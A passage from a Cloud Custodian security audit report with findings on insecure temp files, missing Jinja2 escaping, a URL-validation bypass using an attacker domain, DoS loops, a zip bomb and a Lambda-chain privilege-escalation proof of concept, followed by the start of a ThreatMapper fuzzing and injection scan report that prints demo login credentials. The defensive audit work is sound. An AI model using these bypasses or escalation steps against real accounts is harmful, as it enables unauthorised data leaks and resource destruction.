created_at,\nupdated_at):\n526...\n527\n528 ifexisting_finding_id:\n529 finding_id = existing_finding_id\n530 else :\nCloud Custodian Security Audit 2023 25Cloud Custodian Security Audit 2023 17 apr 2024\n531 ...\n532 finding_id = '{}/{}/{}/{} '.format(\n533 self.manager.config.region,\n534 self.manager.config.account_id,\n535 # we use md5 for id, equiv to using crc32\n536 hashlib.md5( # nosec nosemgrep\n537 json.dumps(policy.data).encode( 'utf8 '),\n538 **params).hexdigest(),\n539 hashlib.md5( # nosec nosemgrep\n540 json.dumps(list(sorted([r[model.id] for r in\nresources]))).encode( 'utf8 '),\n541 **params).hexdigest()\n542 )\n543 finding = {\n544 ...\n545 'Id': finding_id,\n546 ...\n547 }\n548 ...\n549 return filter_empty(finding).\nhttps://github.com/cloud-custodian/cloud-custodian/blob/d458f0a/c7n/resources/ssm.py#L553\n553 def get_item_template(self):\n554 ...\n555 dedup = hashlib.md5(dedup).hexdigest()[:20] # nosec nosemgrep\n556 ...\nMitagation\nChange the use of hashlib.md5 for the more secure hashing algorithms, like sha3 orshake based\nalgorithm.\nCloud Custodian Security Audit 2023 26Cloud Custodian Security Audit 2023 17 apr 2024\nInsecure temporary file creation\nSeverity Informational\nStatus Fixed\nid ADA-CC-2023-2\nComponent ops/azure/container-host-chart\nThe deploy chart operation of Azure uses using deprecated code tempfile.mktemp() method\nwhich creates possible race condition attacks. The tempfile.mktemp() method is deprecated\nbecause it could create a race condition vulnerability, as mentioned by the official python tempfile\nlibrary documentation. The tempfile.mktemp() method is divided into two steps. It first generates\na random temporary filename and then creates the file with the newly generated temporary filename.\nSome other process could create a file in between the two steps of the mktemp() function with\nthe same name generated by the first step of the mktemp() function. This creates a race condition\nsituation and could result in unexpected results when later code accesses the created temp files.\nAttackers are able to make the chart write to a symbolic link with the same path that points to some\nsensitive files in the local storage with the privilege of the Cloud Custodian tool. In addition, attackers\ncould also deny chart writing by changing the permissions of the temp files or inject malicious content\ninto the temp files if they successfully generate a file with their own privilege before mktemp() function\ndoes.\nVulnerable code location\nThe write_values_to_file in deploy_chart.py of Azure provider uses a deprecated python functions\ntempfile.mktemp() which make the code vulnerable to race condition attack.\n97@staticmethod\n98 def write_values_to_file(values):\n99 values_file_path = tempfile.mktemp(suffix= '.yaml ')\n100 with open(values_file_path, 'w') as values_file:\n101 yaml.dump(values, stream=values_file)\n102 return values_file_path\nCloud Custodian Security Audit 2023 27Cloud Custodian Security Audit 2023 17 apr 2024\nMitigation\nThe race condition vulnerability exists because the tempfile.mktemp() function divides the ran-\ndom temporary filename generation and the creation of the temporary file into two steps. To solve this\nvulnerability, just combine the two steps together by generating the file immediately. This could be\ndone by custom logic or replacing tempfile.mktemp() with the newer tempfile.mkstemp()\nfunction which uses the steps combining approach.\nCloud Custodian Security Audit 2023 28Cloud Custodian Security Audit 2023 17 apr 2024\nMissing sanitisation in using Jinja2 library\nSeverity Low\nStatus Reported\nid ADA-CC-2023-3\nComponent c7n mailer\nIn the utils.py of the c7n_mailer tool, the logics use the Jinja2 library to render an HTML email template.\nThe functions get_message_subject andget_jinja_env take in email message parameters\nand path for the email template directory as input and use the Jinja2 library to create and render\nthe HTML email template and email subject. The functions are triggered when a policy-registered\nevent has happened and notify actions are required. The parameters passing to the functions are\nconfigurable by the policy owner and other cloud users who have access to either the environment\nor the resources linked to the registered event. Thus it could contain untrusted data and result in\npossible HTML injection and lead to possible cross-site scripting (XSS) when malicious data is being\nattached to the template or environment variables. According to the documentation of Jinja2, the\ndefault configuration for their Template designer does not have automatic HTML escaping because it\nmay be a huge performance hit if it needs to escape all variables, including some variables that are not\nHTML. In addition, the logic in the utils.py of the c7n_mailer tool does not enable HTML escaping\nby default when using the Jinja2 package nor manually escaping the variable from the Jinja2. Thus it\nresults in possible HTML injection.\nThe get_message_subject function in utils.py of the c7n_mailer tool uses jinja2 library without\nHTML escaping.\n134 def get_message_subject(sqs_message):\n135 ...\n136 jinja_template = jinja2.Template(subject)\n137 subject = jinja_template.render(\n138 account=sqs_message.get(\"account\", \"\"),\n139 account_id=sqs_message.get(\"account_id\", \"\"),\n140 partition=sqs_message.get(\"partition\", \"\"),\n141 event=sqs_message.get(\"event\", None),\n142 action=sqs_message[\"action\"],\n143 policy=sqs_message[\"policy\"],\n144 region=sqs_message.get(\"region\", \"\"),\n145 )\n146 return subject\nCloud Custodian Security Audit 2023 29Cloud Custodian Security Audit 2023 17 apr 2024\nThe get_jinja_env function in utils.py of the c7n_mailer tool uses jinja2 library without HTML\nescaping.\n64def get_jinja_env(template_folders):\n65 env = jinja2.Environment(trim_blocks=True, autoescape=False)\n66 ...\n67 env.loader = jinja2.FileSystemLoader(template_folders)\n68 return env\nMitigation\nThe main problem of this vulnerability is the missing HTML escaping and validation before using the\nrendered result. One possible solution is to turn on the automatic HTML escaping when using the\njinja2 library but it could create a large overhead if the template is large. The other way is adding logic\nbefore the use of the Jinja2 library to escape all HTML-related parameters before passing them to the\nJinja2 library to ensure all of them are correctly sanitized before using them for HTML rendering.\nCloud Custodian Security Audit 2023 30Cloud Custodian Security Audit 2023 17 apr 2024\nUsing deprecated and insecure ssl.wrap_socket\nSeverity Low\nStatus Reported\nid ADA-CC-2023-4\nComponent c7n kube\nSSL versions 2 and 3 are considered insecure and completely broken. Therefore it is dangerous to\nuse. Because of that, the ssl.wrap_socket() function is deprecated as it defaults to an insecure\nversion of SSL/TLS and does not specify a minimum supporting SSL/TLS protocol version. It also does\nnot have support for server name indication (SNI) and hostname matching. An attacker could force it\nto create an SSL/TLS session with broken SSL protocol versions by a downgrade attack, claiming that\nonly an insecure version of SSL is supported during the handshake process. Besides, attackers can\nspoof the hostname/server name and cause the later communication and connection vulnerable to\nattacks. This makes the use of ssl.wrap_socket() for creating SSL socket connection insecure\nand vulnerable to different kinds of attacks on insecure and broken SSL/TLS protocol versions.\nVulnerable code location\nThe get_finding function in server.py of Cloud Custodian Kubernetes provider uses the deprecate\nfunction ssl.wrap_socket() .\n196 def get_finding(self, resources, existing_finding_id, created_at,\nupdated_at):\n197...\n198 server.socket = ssl.wrap_socket(\n199 server.socket,\n200 server_side=True,\n201 certfile=cert_path,\n202 keyfile=cert_key_path,\n203 ca_certs=ca_cert_path,\n204 )\nMitigation\nThe deprecated ssl.wrap_socket() function should be replaced by the newer ssl.\nSSLContext.wrap_socket() function. This new function returns an SSLContext object,\nCloud Custodian Security Audit 2023 31Cloud Custodian Security Audit 2023 17 apr 2024\nencapsulating the settings and enforcing SNI and hostname matching with default disabling of inse-\ncure SSL/TLS version. That could deny possible downgrade attacks or hostname/server name spoofing.\nIf no specific security policies or requirements are needed, ssl.create_default_context()\nfunction could be used to create a default SSLContext object without the need to specify the security\nconfigurations.\nRemark\nAs the new ssl.SSLContext.wrap_socket() only supports Stream type socket, thus transfer-\nring the use of ssl.wrap_socket() may not be a trivial task to do so.\nCloud Custodian Security Audit 2023 32Cloud Custodian Security Audit 2023 17 apr 2024\nIndex out of range in ARN parser\nSeverity Informational\nStatus Fixed\nid ADA-CC-2023-5\nComponent arn parser\nCloud Custodians ARN is susceptible to an index out of range issue from a string split and an assumed\narray-length. This is a cosmetic issue, since ARNs are never user supplied. Nevertheless, fixing the issue\navoids issues in the future in case the use case of the code containing the issue changes. In addition,\nfixing the issue also allows the fuzzer to reason about the code without getting blocked by a cosmetic\nbug.\nThe issue exists on the following lines:\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\ne20591d4203257652e2de29e237479e81e958ab4/c7n/resources/aws.py#L298-L305\n298 def parse(cls, arn):\n299 ifisinstance(arn, Arn):\n300 return arn\n301 parts = arn.split( ':', 5)\n302 # a few resources use qualifiers without specifying type\n303 ifparts[2] in ( 's3','apigateway ','execute-api ','emr-\nserverless '):\n304 parts.append(None)\n305 parts.append(None)\nOn line 303, the parser reads the third index of the array, however, there can be fewer than three\nelements in the array.\nThis issue was found by the ARN parser fuzzer.\nMitigation\nWe recommend checking that there is a third element in the array before reading it.\nCloud Custodian Security Audit 2023 33Cloud Custodian Security Audit 2023 17 apr 2024\nImproper URL substring validation can leak data\nSeverity Low\nStatus Fixed\nid ADA-CC-2023-6\nComponent c7n\nCloud Custodians base notifier is susceptible to an improper URL string validation which may allow an\nattacker to trick Cloud Custodian into leaking data by sending messages to URLs under the attackers\ncontrol. The issue allows an attacker who can add items to the transport queue to control the URL\nthat the base notifier sends payloads to. Besides the potential for leaking data, an attacker could also\nmanipulate subsequent workflow by crafting a malicious response to Cloud Custodian.\nThe issue requires high privileges to exploit: Permissions to deploy policies are necessary.\nThe issue exists in send_sqs() ofBaseNotifier :\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\nd458f0a24629b5f01160568ef96e728744dc9bbc/c7n/actions/notify.py#L383-L419\n383 def send_sqs(self, message, payload):\n384 queue = self.data[ 'transport ']['queue '].format(**message)\n385 ifqueue.startswith( 'https://queue.amazonaws.com '):\n386 region = 'us-east-1 '\n387 queue_url = queue\n388 elif 'queue.amazonaws.com 'in queue:\n389 region = queue[len( 'https:// '):].split( '.', 1)[0]\n390 queue_url = queue\n391 elif queue.startswith( 'https://sqs. '):\n392 region = queue.split( '.', 2)[1]\n393 queue_url = queue\n394 elif queue.startswith( 'arn: '):\n395 queue_arn_split = queue.split( ':', 5)\n396 region = queue_arn_split[3]\n397 owner_id = queue_arn_split[4]\n398 queue_name = queue_arn_split[5]\n399 queue_url = \"https://sqs.%s.amazonaws.com/%s/%s\" % (\n400 region, owner_id, queue_name)\n401 else :\n402 region = self.manager.config.region\n403 owner_id = self.manager.config.account_id\n404 queue_name = queue\nCloud Custodian Security Audit 2023 34Cloud Custodian Security Audit 2023 17 apr 2024\n405 queue_url = \"https://sqs.%s.amazonaws.com/%s/%s\" % (\n406 region, owner_id, queue_name)\n407 client = self.manager.session_factory(\n408 region=region, assume=self.assume_role).client( 'sqs')\n409 attrs = {\n410 'mtype ': {\n411 'DataType ':'String ',\n412 'StringValue ': self.C7N_DATA_MESSAGE,\n413 },\n414 }\n415 result = client.send_message(\n416 QueueUrl=queue_url,\n417 MessageBody=payload,\n418 MessageAttributes=attrs)\n419 return result[ 'MessageId ']\nThe issue lies in the two first branches of send_sqs . Assuming that an attacker can control the queue\nvariable defined on line 384, they can get past the first conditional check on line 385-387 if queue\ndoes not start with the string https://queue.amazonaws.com . The second conditional checks\nwhether queue.amazonaws.com is a substring of queue . An attacker can bypass that in a number\nof ways, either by crafting a subdomain of their own domain, for example queue.amazonaws.\ncom.malicious-url.cc , or by including a URL parameter, for example: malicious-url.cc?\nqueue.amazonaws.com . The conditional check on line 388 will return true and queue_url will\nbe assigned the attackers URL. send_sqs will proceed to line 407, and the client will sent the message\nto the attacker-controlled URL on line 416.\nMitigation\nImprove URL sanitization of the queue value. For example, remove the labeling part of the URL to\nensure that only the needed domain is included in send_sqs . Splitting the string into domain and\npath before checking could also help.\nCloud Custodian Security Audit 2023 35Cloud Custodian Security Audit 2023 17 apr 2024\nPossible DoS from attacker-controller Github account\nSeverity Low\nStatus Fixed\nid ADA-CC-2023-7\nComponent c7n policystream\nCloud Custodians PolicyStream tool is vulnerable to an infinity loop from an attacker-controlled limit\nin a for loop. The root cause is that the Policy Stream tool loops through all repositories belonging to\nan organization without setting a limit to the number of iterations. The repositories are remote and an\npotential attacker has numerous ways to control the list of repositories returned to Cloud Custodian. If\nthey can achieve a position where they control the list of repositories returned to Cloud Custodian,\nthey could cause Cloud Custodian to go into an infinity loop and thereby cause a denial of service.\nThe root cause of the issue is in the org_checkout CLI call. This API loops through all repositories of\nan organization and applies filtering in each iteration:\nhttps://github.com/cloud-custodian/cloud-custodian/blob/e425311da975e9d03e69f4d33bfeec7ebe65f932/\ntools/c7n_policystream/policystream.py#L743-L786\n743 def org_checkout(organization, github_url, github_token, clone_dir,\n744 verbose, filter, exclude):\n745 \"\"\"Checkout repositories from a GitHub organization.\"\"\"\n746 logging.basicConfig(\n747 format=\"%(asctime)s: %(name)s:%(levelname)s %(message)s\",\n748 level=(verbose and logging.DEBUG or logging.INFO))\n749\n750 callbacks = pygit2.RemoteCallbacks(\n751 pygit2.UserPass(github_token, 'x-oauth-basic '))\n752\n753 repos = []\n754 for r in github_repos(organization, github_url, github_token):\n755 iffilter:\n756 found = False\n757 for f in filter:\n758 iffnmatch(r[ 'name '], f):\n759 found = True\n760 break\n761 ifnot found:\n762 continue\n763\nCloud Custodian Security Audit 2023 36Cloud Custodian Security Audit 2023 17 apr 2024\n764 ifexclude:\n765 found = False\n766 for e in exclude:\n767 iffnmatch(r[ 'name '], e):\n768 found = True\n769 break\n770 iffound:\n771 continue\n772\n773 repo_path = os.path.join(clone_dir, r[ 'name '])\n774 repos.append(repo_path)\n775 ifnot os.path.exists(repo_path):\n776 log.debug(\"Cloning repo: %s/%s\" % (organization, r[ 'name '])\n)\n777 repo = pygit2.clone_repository(\n778 r['url'], repo_path, callbacks=callbacks)\n779 else :\n780 repo = pygit2.Repository(repo_path)\n781 ifrepo.status():\n782 log.warning( 'repo %s not clean skipping update ', r[ '\nname '])\n783 continue\n784 log.debug(\"Syncing repo: %s/%s\" % (organization, r[ 'name '])\n)\n785 pull(repo, callbacks)\n786 return repos\nAn attacker could obtain control over the Github organization in a number of ways; For example, the\nowner of the github organization may not be using proper configuration such as 2FA and permission\nlevels, and an attacker could compromise the Github organization and launch the attack. Alternatively,\nan attacker pretend to be a legitimate contributor over a longer time, make legitimate contributions,\nreview pull requests etc to build up credibility. The attacker could then choose to launch the attack\nat a the most lucrative time. The attack could be against a competitor with the goal of achieving a\ntime-advantage in certain operations such as research, business, trading or military operations. These\nare examples that illustrate the Cloud Custodian does not control the data coming from the remote\ngithub repository, whereas fully untrusted users may be able to control it. As such, the data from the\nremote repositories can be fully untrusted.\nThe attack is also possible without creating the repositories, if the attacker can intercept communica-\ntion and control the response returned to Cloud Custodian on these lines: https://github.com/cloud-\ncustodian/cloud-custodian/blob/e425311da975e9d03e69f4d33bfeec7ebe65f932/\ntools/c7n_policystream/policystream.py#L665C9-L666\nIn the attacker can control these lines, they can control the JSON that Cloud Custodian uses to create\ntherepos variable. Cloud Custodian does not validate whether the repo belongs to the organization\nwhen invoking the loop:\nCloud Custodian Security Audit 2023 37Cloud Custodian Security Audit 2023 17 apr 2024\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\ne425311da975e9d03e69f4d33bfeec7ebe65f932/tools/c7n_policystream/policystream.py#L754-\nL771\n754 for r in github_repos(organization, github_url, github_token):\n755 iffilter:\n756 found = False\n757 for f in filter:\n758 iffnmatch(r[ 'name '], f):\n759 found = True\n760 break\n761 ifnot found:\n762 continue\n763\n764 ifexclude:\n765 found = False\n766 for e in exclude:\n767 iffnmatch(r[ 'name '], e):\n768 found = True\n769 break\n770 iffound:\n771 continue\nAn attacker could therefore return a JSON response pointing to repositories from other Github accounts\nand achieve the same goal.\nMitigation\nWe recommend resolving all of the below: 1. Either add a counter to each loop iteration and stop after\namaxAllowed limit or check the number of repositories before starting the loop. 2. Validate in the\nbeginning of the loop whether each repository belongs to the organization.\nCloud Custodian Security Audit 2023 38Cloud Custodian Security Audit 2023 17 apr 2024\nPossible DoS from attacker-controller Github repository\nSeverity Low\nStatus Fixed\nid ADA-CC-2023-8\nComponent c7n policystream\nCloud Custodians PolicyStream tool is vulnerable to an infinity loop from an attacker-controlled limit in\na loop. The root cause is that the Policy Stream tool loops through all commits in a repository without\nsetting a limit to the number of iterations. The repository is cloned from remote and a potential attacker\nhas numerous ways of controlling it and thereby the number of commits it has. If they can achieve a\nposition where they control the repository and create a high number of commits, they could cause\nCloud Custodian to go into an infinity loop and thereby cause a denial of service, since Cloud Custodian\nwould not terminate its operation and would not be able to process subsequent operations.\nThe root cause of the issue is in the delta_stream CLI call. This API loops through all commits of a\nbranch of a repository:\nhttps://github.com/cloud-custodian/cloud-custodian/blob/e425311da975e9d03e69f4d33bfeec7ebe65f932/\ntools/c7n_policystream/policystream.py#L316-L345\n316 def delta_stream(self, target= 'HEAD ', limit=None,\n317 sort=pygit2.GIT_SORT_TIME | pygit2.\nGIT_SORT_REVERSE,\n318 after=None, before=None):\n319 \"\"\"Return an iterator of policy changes along a commit lineage\nin a repo.\n320 \"\"\"\n321 iftarget == 'HEAD ':\n322 target = self.repo.head.target\n323\n324 commits = []\n325 for commit in self.repo.walk(target, sort):\n326 cdate = commit_date(commit)\n327 log.debug(\n328 \"processing commit id:%s date:%s parents:%d msg:%s\",\n329 str(commit.id)[:6], cdate.isoformat(),\n330 len(commit.parents), commit.message)\n331 ifafter and cdate > after:\n332 continue\n333 ifbefore and cdate < before:\nCloud Custodian Security Audit 2023 39Cloud Custodian Security Audit 2023 17 apr 2024\n334 continue\n335 commits.append(commit)\n336 iflimit and len(commits) > limit:\n337 break\n338\n339 iflimit:\n340 self.initialize_tree(commits[limit].tree)\n341 commits.pop(-1)\n342\n343 for commit in commits:\n344 for policy_change in self._process_stream_commit(commit):\n345 yield policy_change\nAn attacker could obtain control over the Github repository in a number of ways; For example, the\nowner of the github repository may not be using proper configuration such as 2FA, and an attacker\ncould compromise the owners account and launch the attack. Alternatively, an attacker can pretend to\nbe a legitimate contributor over a longer time, make legitimate contributions, review pull requests\netc to build up credibility. The attacker could then choose to launch the attack at a the most lucrative\ntime. The attack could be against a competitor with the goal of achieving a time-advantage in certain\noperations such as research, business, trading or military operations. These are examples that illustrate\nthe Cloud Custodian does not control the data coming from the remote github repository, whereas\nfully untrusted users may be able to control it. As such, the data from the remote repositories can be\nfully untrusted.\ndelta_stream has an option to limit the number of iterations, however, this is off per default.\nMitigation\nWe recommend resolving all of the below: 1. Change the default limit parameter to a number instead\nofNone\nCloud Custodian Security Audit 2023 40Cloud Custodian Security Audit 2023 17 apr 2024\nPossible zip bomb from large S3 object\nSeverity Moderate\nStatus Reported\nid ADA-FASTIFY-2023-9\nComponent c7n\nCloud Custodian is susceptible to a possible Denial-of-Service from a maliciously crafted S3 object.\nThe attack would allow an attacker to exhaust memory of the machine and prevent Cloud Custodian\nfrom performing subsequent operations after the vulnerable code part has been invoked. The root\ncause is that Cloud Custodian decompresses compressesd S3 objects without hardening against large\nobjects. As such, an attacker with permissions to create S3 objects can create a malicious S3 object\nthat will cause Cloud Custodian to exhaust memory when Cloud Custodian resolves it.\nThe issue exists in two places in the Cloud Custodian URIResolver:\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\n61ad56cc748e19230cf5794db1dfd3364bc3e66b/c7n/resolver.py#L44-L50\n44 def handle_response_encoding(self, response):\n45 ifresponse.info().get( 'Content-Encoding ') != 'gzip ':\n46 return response.read().decode( 'utf-8 ')\n47\n48 data = zlib.decompress(response.read(),\n49 ZIP_OR_GZIP_HEADER_DETECT).decode( 'utf8 '\n)\n50 return data\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\n61ad56cc748e19230cf5794db1dfd3364bc3e66b/c7n/resolver.py#L52-L68\n52 ` ` `python\n53 def get_s3_uri(self, uri):\n54 parsed = urlparse(uri)\n55 params = dict(\n56 Bucket=parsed.netloc,\n57 Key=parsed.path[1:])\n58 ifparsed.query:\n59 params.update(dict(parse_qsl(parsed.query)))\n60 region = params.pop( 'region ', None)\n61 client = self.session_factory().client( 's3', region_name=region\n)\nCloud Custodian Security Audit 2023 41Cloud Custodian Security Audit 2023 17 apr 2024\n62 result = client.get_object(**params)\n63 body = result[ 'Body '].read()\n64 ifparams[ 'Key'].lower().endswith(( '.gz','.zip ','.gzip ')):\n65 return zlib.decompress(body, ZIP_OR_GZIP_HEADER_DETECT).\ndecode( 'utf-8 ')\n66 elif isinstance(body, str):\n67 return body\n68 else :\n69 return body.decode( 'utf-8 ')\nA denial-of-service scenario can arise purposefully or accidentally; An attacker can specifically craft a\nmalicious S3 object that allocates a lot of memory when Cloud Custodian decompresses it, or the AWS\nadmin can accidentally set no limit to the object, and a large one will accidentally be created during\nnormal business operations and exhaust memory. At the time of this audit, an S3 object can be up to\n5TB in size which will be enough to exhaust memory in the majority of use cases.\nMitigation\n•Decompress in chunks.\nCloud Custodian Security Audit 2023 42Cloud Custodian Security Audit 2023 17 apr 2024\nPrivilege escalation through chained Lambda functions in AWS\nSeverity Moderate\nStatus Reported\nid ADA-CC-2023-10\nComponent c7n\nCloud Custodian is susceptible to a privilege escalation issue on AWS from an underlying prioritization\nof privileges in AWS between user privileges and Lambda privileges. This is an issue in AWS that Cloud\nCustodian inherits. We consider the impact of the issue to be High, however, Cloud Custodian may\nopinionatedly reject the root cause of this issue to exist in Cloud Custodian. The reason for this is that\nAWS users are exposed to the same issue.\nThe issue exists because users in AWS inherit the privileges of the Lambda functions that the users\nhave privileges to invoke, even if the user does not have privileges to carry the actions against the\nresources that the Lambda functions have privileges to. For example, consider a scenario where a user\nhas privileges to read resources of type “A” , and invoke Lambda function “B” , and Lambda function “B”\nhas privileges to create resources of type “A” . In this case, the user will also have privileges to create\nresources of type “A” , even if the cluster admin has not excplicitly assigned those privileges.\nBelow we exmplify the issue with a user that has read-only privileges against EC2 instances, access to\nthe cloud shell, read-only access to Lambda functions and read-only access to IAM. In addition, the\nuser has permissions to invoke Lambda functions. The same example Cloud Custodian deployment\nhas a function called Invoker() which has permissions to invoke another Lambda function called\nterminate_instance .terminate_instance has privileges to terminate EC2 instances - a\nprivilege that the user does not have.\nIn this case, the user has permissions to terminate EC2 instances, even though the cluster admin has\nnot assigned these to the user.\nCluster assets and permissions\nUser Permissions\n•AWS managed permissions:\nCloud Custodian Security Audit 2023 43Cloud Custodian Security Audit 2023 17 apr 2024\nFigure 4: Privilege escalation illustration\n–AmazonEC2ReadOnlyAccess\n–AWSCloudShellFullAccess\n–AWSLambda_ReadOnlyAccess\n–IAMReadOnlyAccess\n•Custom permissions:\n–lambda:InvokeFunction\n–lambda:InvokeAsync ##### Lambda Function Invoker ###### Permissions\n•Custom permissions:\n–lambda:InvokeFunction\n–lambda:InvokeAsync ##### Lambda Function “terminate_instance” ###### permissions\n•Custom permissions:\n–ec2:terminate_instance\nCode for lambda function Invoker If the users attempts to run a Cloud Custodian policy directly to\nterminate an EC2 instance, they are denied with the following error:\n1botocore.exceptions.ClientError: An error occurred (\nUnauthorizedOperation) when calling the TerminateInstances operation\n: You are not authorised to perform this operation.\nCloud Custodian Security Audit 2023 44Cloud Custodian Security Audit 2023 17 apr 2024\nHowever, by invoking the chain of the two Lambda functions, the user can still terminate EC2 instances.\nThe user can invoke the Lambda function Invoker which invokes terminate_instance which\nterminates an EC2 instance. Consider the following proof concept:\nCode for lambda function Invoker\n1import json\n2import boto3\n3\n4client = boto3.client( 'lambda ')\n5\n6def lambda_handler(event, context):\n7 response = client.invoke(\n8 FunctionName= 'arn:aws:lambda:eu-north-1:[ACCOUNTID]:function:\nterminate_instance ',\n9 InvocationType= 'RequestResponse ',\n10 Payload=json.dumps(inputForInvoker)\n11 )\n12\n13 print(json.load(response[ 'Payload ']))\nCode for lambda function terminate_instance\n1import json\n2import boto3\n3\n4def lambda_handler(event, context):\n5 ec2 = boto3.client( 'ec2', region_name= 'eu-north-1 ')\n6 ec2.terminate_instances(InstanceIds=[ '[INSTANCEID] '])\nProof of concept\nAssume there is one EC2 instance in the cloud account. With tag:Name = t1 and instance id = i-0080\na65c233f313fd .\nFigure 5: Instance List\nIn this situation, the user “Test” has a limited set of permissions as stated above. He/she cannot execute\na Cloud Custodian policy directly to EC2 in order to terminate an instance, because he/she only has\nread-only access to the EC2 resources. The following Cloud Custodian policy will fail.\nCloud Custodian Security Audit 2023 45Cloud Custodian Security Audit 2023 17 apr 2024\n1policies:\n2 - name: ec2-delete-marked\n3 resource: ec2\n4 filters:\n5 - \"tag:Name\": \"t1\"\n6 actions:\n7 - type: terminate\n8 force: true\nThe error message from the above Cloud Custodian policy execution is as follows.\n1botocore.exceptions.ClientError: An error occurred (\nUnauthorizedOperation) when calling the TerminateInstances operation\n: You are not authorised to perform this operation.\nHowever it is found that the user Test could still be able to terminate an instance with a detour path.\nThe user Test can run a Cloud Custodian policy that invokes a lambda function “Invoker” , where\n“Invoker” has permission and logic to invoke another lambda function “terminate_instance” . If “termi-\nnate_instance” does have the EC2 instance termination permission. The policy to invoke “Invoker”\ncould end up terminating an instance in EC2, given that neither the user “Test” nor the lambda function\n“Invoker” has the EC2 instance termination right. Cloud Custodian did not mitigate this kind of attack.\nThe following is a policy for invoking the lambda function “Invoker”\nCloud custodian policy that user Test could deploy and terminate an instance\n1policies:\n2 - name: invoke\n3 resource: ec2\n4 filters:\n5 - \"tag:Name\": \"t1\"\n6 actions:\n7 - type: invoke-lambda\n8 function: Invoker\nThe following result shows that the policies has run successfully.\n12023-10-09 18:08:22,470: custodian.commands:DEBUG Loaded file invoke.\nyml. Contains 1 policies\n22023-10-09 18:08:22,486: custodian.aws:DEBUG using default region:eu-\nnorth-1 from boto\n32023-10-09 18:08:23,089: custodian.output:DEBUG Storing output with <\nLogFile file://./invoke/custodian-run.log>\n42023-10-09 18:08:23,100: custodian.policy:DEBUG Running policy:invoke\nresource:ec2 region:eu-north-1 c7n:0.9.29\n52023-10-09 18:08:23,100: custodian.cache:DEBUG expiring stale cache\nentries\n62023-10-09 18:08:23,101: custodian.resources.ec2:DEBUG Using cached c7n\n.resources.ec2.EC2: 1\nCloud Custodian Security Audit 2023 46Cloud Custodian Security Audit 2023 17 apr 2024\n72023-10-09 18:08:23,101: custodian.resources.ec2:DEBUG Filtered from 1\nto 1 ec2\n82023-10-09 18:08:23,101: custodian.policy:INFO policy:invoke resource:\nec2 region:eu-north-1 count:1 time:0.00\n92023-10-09 18:08:23,706: custodian.policy:INFO policy:invoke action:\nlambdainvoke resources:1 execution_time:0.60\n102023-10-09 18:08:23,708: custodian.output:DEBUG metric:ResourceCount\nCount:1 policy:invoke restype:ec2 scope:policy\n112023-10-09 18:08:23,708: custodian.output:DEBUG metric:ApiCalls Count:2\npolicy:invoke restype:ec2\nThe instance is being terminated.\nFigure 6: Terminated Instance\nImpact\nAll Cloud Custodian can be impacted by this, but will not be by default when using Cloud Custodian.\nUsers need will need to configure their Cloud Custodian deployment in a similar manner exemplified\nabove. Users will not easily accidentally configure their deployments in such a manner, however, the\nmore complex the deployment regardingnumber of users users, permissions and Lambda functions,\nthe more likely a mistake can happen that allows for this privilege escalation. As such, users must\nenable a configuration that allows this privilege escalation.\nThe issue can result in escalation to the highest level of privileges that the cluster admin has enabled,\nhowever, this is highly dependent on a particular Cloud Custodian deployment. As such, users should\nconsider this on a case-by-case basis.\nCloud Custodian Security Audit 2023 47" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-15 16_58_06.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 8/Security Test Suite 1/https://deepfence.show TestCase\nSummary\nStarted at 2021-04-15 16:58:06\nTime taken 00:17:01.312\nTotal scans performed: 2042\nIssues found: 1990\nScan Issues Found In Test StepsTotal Issues \nFound\nFuzzing Scan GET 100 100\nXPath Injection GET 20 20\nHTTP Method \nFuzzingGET 10 10\nCross Site \nScriptingGET 184 184\nSQL Injection GET 1626 1626\nInvalid Types GET 50 50\nDetailed Info\nIssues are grouped by Security scan.\nFuzzing Scan\nA Fuzzing Security Scan generates random content and inserts it into your parameters, trying to \ncause your API to behave incorrectly or reveal sensitive data.\nErrors usually indicate that you have to improve input validation and error handling.\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.iooEVuz2MMq\nDemoUser1# AdFI9GIn9CZISDk\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #1\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioe9mrACMGj6lTE\nDemoUser1# 